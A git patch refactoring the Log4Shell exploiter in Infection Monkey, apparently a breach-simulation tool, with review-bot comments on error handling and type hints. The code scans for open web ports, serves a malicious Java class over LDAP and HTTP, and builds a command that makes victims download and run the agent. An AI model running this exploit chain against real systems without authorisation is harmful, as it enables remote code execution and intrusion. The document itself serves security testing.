From 031cafbe120456328f803456a4180004b8701709 Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Wed, 2 Mar 2022 14:23:34 -0500
Subject: [PATCH] Agent: Refactor Log4ShellExploiter to work with Puppet
---
 monkey/infection_monkey/exploit/log4shell.py | 58 +++++++++-----------
 1 file changed, 26 insertions(+), 32 deletions(-)
diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py
index b917099e7..bfc0b4b46 100644
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@@ -13,18 +13,13 @@ from infection_monkey.exploit.log4shell_utils import (
 from infection_monkey.exploit.tools.helpers import get_monkey_depth
 from infection_monkey.exploit.tools.http_tools import HTTPTools
 from infection_monkey.exploit.web_rce import WebRCE
+from infection_monkey.i_puppet.i_puppet import ExploiterResultData
 from infection_monkey.model import DOWNLOAD_TIMEOUT as AGENT_DOWNLOAD_TIMEOUT
-from infection_monkey.model import (
- DROPPER_ARG,
- LOG4SHELL_LINUX_COMMAND,
- LOG4SHELL_WINDOWS_COMMAND,
- VictimHost,
-)
+from infection_monkey.model import DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, LOG4SHELL_WINDOWS_COMMAND
 from infection_monkey.network.info import get_free_tcp_port
 from infection_monkey.network.tools import get_interface_to_target
 from infection_monkey.utils.commands import build_monkey_commandline
 from infection_monkey.utils.monkey_dir import get_monkey_dir_path
-from monkey.infection_monkey.i_puppet.i_puppet import ExploiterResultData
 logger = logging.getLogger(__name__)
@@ -38,9 +33,24 @@ class Log4ShellExploiter(WebRCE):
 5 # Max time agent will wait for the response from victim in SECONDS
 )
- def __init__(self, host: VictimHost):
- super().__init__(host)
+ def _exploit_host(self) -> ExploiterResultData:
+ self._open_ports = [
+ int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
+ ]
+ if not self._open_ports:
+ logger.info("Could not find any open web ports to exploit")
+ return self.exploit_result
+
+ self._configure_servers()
+ self._start_servers()
+ try:
+ self.exploit(None, None)
+ return self.exploit_result
+ finally:
+ self._stop_servers()
+
+ def _configure_servers(self):
 self._ldap_port = get_free_tcp_port()
 self._class_http_server_ip = get_interface_to_target(self.host.ip_addr)
@@ -49,29 +59,15 @@ class Log4ShellExploiter(WebRCE):
 self._ldap_server = None
 self._exploit_class_http_server = None
 self._agent_http_server_thread = None
- self._open_ports = [
- int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
- ]
-
- def _exploit_host(self) -> ExploiterResultData:
- if not self._open_ports:
- logger.info("Could not find any open web ports to exploit")
- return self.exploit_result
-
- self._start_servers()
- try:
- self.exploit(None, None)
- return self.exploit_result
- finally:
- self._stop_servers()
 def _start_servers(self):
+ dropper_target_path = self.monkey_target_paths[self.host.os["type"]]
+
 # Start http server, to serve agent to victims
- paths = self.get_monkey_paths()
- agent_http_path = self._start_agent_http_server(paths)
+ agent_http_path = self._start_agent_http_server(dropper_target_path)
 # Build agent execution command
- command = self._build_command(paths["dest_path"], agent_http_path)
+ command = self._build_command(dropper_target_path, agent_http_path)
 # Start http server to serve malicious java class to victim
 self._start_class_http_server(command)
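Review bot: In the new `_exploit_host`, `self._start_servers()` runs before the `try:`, so the `finally:` that calls `self._stop_servers()` only protects `self.exploit(None, None)`. `_start_servers` brings up the agent HTTP server, the class HTTP server and the LDAP server one after another; if a later one raises, the earlier listeners stay bound on the agent's host with nothing left to shut them down. Making `self._start_servers()` the first statement inside the `try:` closes that gap. That change is only safe if `_stop_servers` tolerates servers that are still `None`, and its body lies outside this hunk, so that needs confirming.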
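Review bot: The lookup `self.monkey_target_paths[self.host.os["type"]]` added at the top of `_start_servers` is unguarded, so a host with no recorded OS type, or one that is not a key of `monkey_target_paths`, ends the attempt with a bare `KeyError`. The caller `_exploit_host` invokes `_start_servers()` outside its `try:`, so that error propagates instead of being logged and reported through `exploit_result`, as the missing-ports case is. A membership check before the lookup, with a `logger.info(...)` and an early `return self.exploit_result` in `_exploit_host`, would make the unsupported-target case explicit. A one-line comment saying what `monkey_target_paths` is keyed by would also help, since its definition is not in this file section.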
@@ -79,10 +75,10 @@ class Log4ShellExploiter(WebRCE):
 # Start ldap server to redirect ldap query to java class server
 self._start_ldap_server()
- def _start_agent_http_server(self, agent_paths: dict) -> str:
+ def _start_agent_http_server(self, dropper_target_path) -> str:
 # Create server for http download and wait for it's startup.
 http_path, http_thread = HTTPTools.try_create_locked_transfer(
- self.host, agent_paths["src_path"]
+ self.host, dropper_target_path, self.agent_repository
 )
 self._agent_http_server_thread = http_thread
 return http_path
@@ -118,9 +114,7 @@ class Log4ShellExploiter(WebRCE):
 def _build_command(self, path, http_path) -> str:
 # Build command to execute
- monkey_cmd = build_monkey_commandline(
- self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path
- )
+ monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, location=path)
 if "linux" in self.host.os["type"]:
 base_command = LOG4SHELL_LINUX_COMMAND
 else:
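Review bot: In the `@@ -79,10 +75,10 @@` hunk, `_start_agent_http_server` stores and returns the result of `HTTPTools.try_create_locked_transfer(...)` without checking it. The helper is not shown on this page, but its `try_` prefix suggests it can fail without raising; if so, an empty `http_path` would flow into `_build_command` and `_agent_http_server_thread` would be left unset, with the failure surfacing only later. A check right after the call that logs and aborts the attempt would keep the failure at its source. The rewritten signature also lost its annotation (`agent_paths: dict` became a bare `dropper_target_path`), so annotating the parameter with the value type of `monkey_target_paths` would keep it as informative as before.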